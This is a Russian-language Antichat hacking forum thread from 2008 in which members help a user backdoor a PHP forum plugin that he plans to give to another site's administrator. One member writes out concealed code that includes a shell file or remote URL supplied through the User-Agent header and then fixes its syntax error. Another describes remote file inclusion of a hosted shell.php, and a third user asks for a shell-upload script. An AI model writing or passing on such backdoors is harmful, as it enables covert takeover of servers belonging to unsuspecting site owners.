ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2501  
Старый 30.03.2008, 11:12
Аватар для .:EnoT:.
.:EnoT:.
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771

Репутация: 1916


По умолчанию

Цитата:
Сообщение от Scipio  
у тебя engtype, а надо enctype
аааа...блин...опечатался и сидел думал чё за хня.
Скип и Воланд спасибо
пойду убью себя ап стену =/
 
Ответить с цитированием

  #2502  
Старый 30.03.2008, 11:32
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

ne короче такая тема нашел на сайте инклуд. инклудит страницу с другого сайта например страница php открывается как php а когда инклудишь txt открывается как txt что нить можно сделать с такой иньекцией
 
Ответить с цитированием

  #2503  
Старый 30.03.2008, 11:53
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от QZAR-X  
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд.
Так тебе надо скрипт протроянить? вот:
Цитата:
$k=$_SERVER["USER_AGENT"];
это где нить незаметно так

if (strpos($k,"f35761"){ $path=explode(":",$k); include($path[1]);}

а уж юзер агент на такой: f35761:/path/to/shell.php
сменить каждый может, и шелл спрятать далеко на сервере или даже на удаленном сервере
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #2504  
Старый 30.03.2008, 11:55
Аватар для QZAR-X
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

Цитата:
Сообщение от Scipio  
Так тебе надо скрипт протроянить? вот:
то что ты мне дал как вызывается?
 
Ответить с цитированием

  #2505  
Старый 30.03.2008, 12:00
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

есть у тебя допустим скрипт:
PHP код:
<?php
....
$k=$_SERVER["USER_AGENT"];
....
if (
strpos($k,"f35761"){ $path=explode("^",$k); include($path[1]);}
....
?>
ты меняешь у себя юзер агент (имя браузера) на например f35761^http://site/shell.php

и вызываешь этот скрипт, он проинклюдит http://site/shell.php
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #2506  
Старый 30.03.2008, 12:02
Аватар для QZAR-X
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

у меня ошибку во 2-ой строке вываливает
Parse error: syntax error, unexpected '{'
 
Ответить с цитированием

  #2507  
Старый 30.03.2008, 12:06
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

после if (strpos($k,"f35761") скобку ) поставь, я почемуто пропустил
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #2508  
Старый 30.03.2008, 12:14
Аватар для lsass.exe
lsass.exe
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
Провел на форуме:
4625160

Репутация: 457
По умолчанию

Цитата:
Сообщение от QZAR-X  
то что ты мне дал как вызывается?
читай внимательнее, это он не тебе писал.

В твоем случае нужно залить на любой другой хост пхп шелл, а потом уже его подключаешь - ?page=http://site.r/shell.php
 
Ответить с цитированием

  #2509  
Старый 30.03.2008, 12:19
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

Цитата:
Сообщение от lsass.exe  
читай внимательнее, это он не тебе писал.

В твоем случае нужно залить на любой другой хост пхп шелл, а потом уже его подключаешь - ?page=http://site.r/shell.php
ни чего все равно не получится он покажет как php shell и не подгрузится
 
Ответить с цитированием

  #2510  
Старый 30.03.2008, 12:24
Аватар для QZAR-X
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

Мне этот инклудинг уже не нужен, т.к. удаленный инклуд запрещен на сервере.
Вот если кто-нибудь напишет маленький скриптик для загрузки на сервер файла, который вызывается script.php?fileupload=shell.php и файл shell.php загрузится в тек. дир.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Delphi, .NET, Asm 5420 17.06.2010 13:33
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ